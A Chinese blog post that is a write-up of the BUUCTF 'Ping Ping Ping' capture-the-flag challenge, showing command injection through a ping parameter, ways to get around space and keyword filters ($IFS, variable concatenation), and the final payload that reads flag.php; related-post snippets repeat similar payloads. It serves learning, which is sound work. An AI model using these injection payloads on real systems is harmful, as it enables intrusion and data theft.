BUUCTF-[GXYCTF2019]Ping Ping Ping

最新推荐文章于 2023-10-07 22:52:04 发布
最新推荐文章于 2023-10-07 22:52:04 发布
阅读量375 收藏 1
点赞数 1
文章标签: 经验分享 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62875941/article/details/122203630
版权

打开链接

/?ip=(GET传参方式) 

这题跟[ACTF2020 新生赛]Exec1差不多

那我们先看看有啥文件

/?ip=;ls或者/?ip=127.0.0.1;ls

(ip地址写啥都行,其中127.0.0.1ping的是本机的地址)

 发现里面有flag.php文件

但是当我去查看flag文件时,发现flag、空格、/、\等符号都被过滤了,当时也在这卡了很久

下面来总结一下常见的绕过方法

1.空格

(1)%20

(2)%09

(3)<>

(4)$IFS$9、 ${IFS}、$IFS

绕过flag字符:采用字符串拼接的方式

例如:a=g;fla$a  -->flag

          a=ag;fl$a  -->flag

然后我们就构造playload获取flag

/?ip=127.0.0.1;a=ag;cat$IFS$9fl$a.php

 flag{99babff4-2dc1-4bc4-9962-1a897ef1686c}

 最后如果打开index,php看的话会发现过滤了很多字符

cri1stur
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
每天一道ctf
whisper921的博客
10-28 843
有这样一行代码
BUUCTF__[GXYCTF2019]Ping Ping Ping_题解
风过江南乱的博客
06-25 3028
前言 我感觉我是一个假的理科生,假的计算机相关专业学生,完全没有该有的样子 这题有点东西,不算太水。只是对我来说。 读题 题目是Ping,打开也没有内容,就一个get传参的ip变量 不过看到ipping就容易联想到,终端ping命令。 先尝试传入一个ip=127.0.0.1,于是乎出现了如下,在终端下执行的效果就是这样,命令执行石锤了。 命令执行可以干很多事,也就是命令行,LInux下大佬们日常操作都用命令行代替鼠标。 首先想到用什么办法?让它执行我们需要的命令。很明显变量ip是突破点。 先看传
BUUCTF [GXYCTF2019]Ping Ping Ping
m0_49025459的博客
04-30 677
题目 打开网站 就这么点东西,啥都没有,那么我们浅试一下 那我们ls一下将文件名都输出出来,我们用几种方式都可以输出文件名 ?ip=127.0.0.1|ls ?ip=127.0.0.1;ls ?ip=127.0.0.1||ls 这里都是用了Windows中的管道符命令 | 直接执行后面的语句,例如 ping 127.0.0.1|whoami ||如果前面执行的语句出错,才执行后面的语句,所以前面的语句必须为假,例如 ping 1||whoami &前面的...
CTFping命令绕过及符号用法
Hardworking666的博客
10-13 9689
文章目录一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ig..
[GXYCTF2019]Ping Ping Ping
qq_37466661的博客
08-27 3275
[GXYCTF2019]Ping Ping Ping CTF 命令执行
python-ping:python ping
05-03
Python平使用python raw套接字Ping usage: sudo ping.py [-h] [--version] [-c COUNT] [-t TTL] [-s PACKETSIZE] [--timeout TIMEOUT] hostpositional arguments: host Target hostoptional arguments: -h, --help ...
http-ping工具
12-03
-h header-line Pass the given header line as-is in each ping request. For example, add a host header like this: -h \"Host: www.site1.com\" Be sure to surround the header-line with quotes. You can ...
node-net-ping:网平
06-15
该模块实现了对ICMP Echo (ping) 支持。 此模块使用: npm install net-ping 它使用require()函数加载: var ping = require ("net-ping"); 然后可以创建一个 ping 会话来 ping 或跟踪到许多主机的路由: var...
ping的工作原理 782-801
05-15
"ping 的工作原理" ping 命令是基于 ICMP 协议工作的,因此要了解 ping 的工作原理,首先我们先来熟悉 ICMP 协议。ICMP 全称是 Internet Control Message Protocol,也就是互联网控制报文协议。 ICMP 的主要功能...
window下可用的arp-ping工具
最新发布
01-03
window下可用的arp-ping工具
buuctf-Ping Ping Ping
m0_52432374的博客
03-13 507
buuctf-Ping Ping Ping 先尝试?ip=127.0.0.1&ls 发现不行 尝试?ip=127.0.0.1|ls,发现可以
BUUCTF】[GXYCTF2019] Ping Ping Ping 总结笔记 Writeup
algae
08-29 9226
BUUCTF】[GXYCTF2019]Ping Ping Ping Writeup0x00 考点1、命令绕过空格方法有:2、内联执行0x01 解题1、简单变量替换,用a覆盖拼接flag2、变量ab互换传递,绕过字符串匹配,实现拼接3、内联执行4、被过滤的bash,用管道+sh替换 0x00 考点 1、命令绕过空格方法有: $IFS$1、${IFS}$1、 {IFS}、IFS 2、内联执行 内联,就是将反引号内命令的输出作为输入执行 ?ip=127.0.0.1;cat$IFS$9`ls` $IFS在Li
BUUCTF-Ping Ping Ping
weixin_51383898的博客
10-07 229
启动靶机,页面提示可以传入的参数为ip=尝试ping一下本地IP地址尝试使用拼接符,空格(space)字符被过滤了,不得行删除空格字符获取当前目录有哪些文件,发现有flag.php和index.php尝试直接读取flag.php文件,不可行,忘记空格被过滤了绕过了空格,flag又被过滤了这时候,还有一个index.php源码文件,尝试读取查阅资料可得,preg_match()函数是PHP中用于匹配正则表达式的函数之一。该函数用来,并将结果存储在一个数组中,。
buuctfPing Ping Ping(命令执行)
zzqzzq11的博客
08-06 1304
buuctf
CTF命令执行及绕过技巧
热门推荐
JBlock的博客
03-07 2万+
前言 今天是代码审计部分的一个技巧补充!前些阵子做了sql注入回顾篇系列!今天开启php代码审计系列! 今天内容主要是CTF中命令注入及绕过的一些技巧!以及构成RCE的一些情景! 文章目录前言正文代码执行代码执行的几种方式命令执行常见命令执行函数绕过姿势敏感字符绕过处理无回显的命令执行Think one Think 正文 在详细介绍命令注入之前,有一点需要注意:命令注入与远程代码执行不同。他们的区...
BUUCTF系列 // [GXYCTF2019] Ping Ping Ping
qq_45805420的博客
10-01 336
前言 本题知识点:命令执行漏洞 WP 打开题目页面,提示很明显,那就先随便 pingIP 地址看看效果 可以看到系统命令被正常执行了,有正确回显 接下来尝试一下是否存在命令执行漏洞,首先用 ls 试一试,看看有没有提示 flag 所在的位置 发现确实存在着命令执行,并且得到了新的线索 先试着直接用 cat 命令读取 flag.php 文件的内容 题目报了个错,(初看没太明白这个提示,后来结合其他的报错,意识到此处原因为空格被过滤了) 既然题目过滤了空格,那就用绕过试试呗 PS:命令执行漏洞,绕过
BUUCTF[GXYCTF2019]PingPingPing
weixin_45253622的博客
05-06 462
测试:?ip=127.0.0.1 测试:?ip=1&whoami 怀疑&被过滤,使用;替代: 发现可以,然后我们看看ls ?ip=1;ls 测试:/?ip=1;cat /flag 被过滤掉了,但是我们不知道什么

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值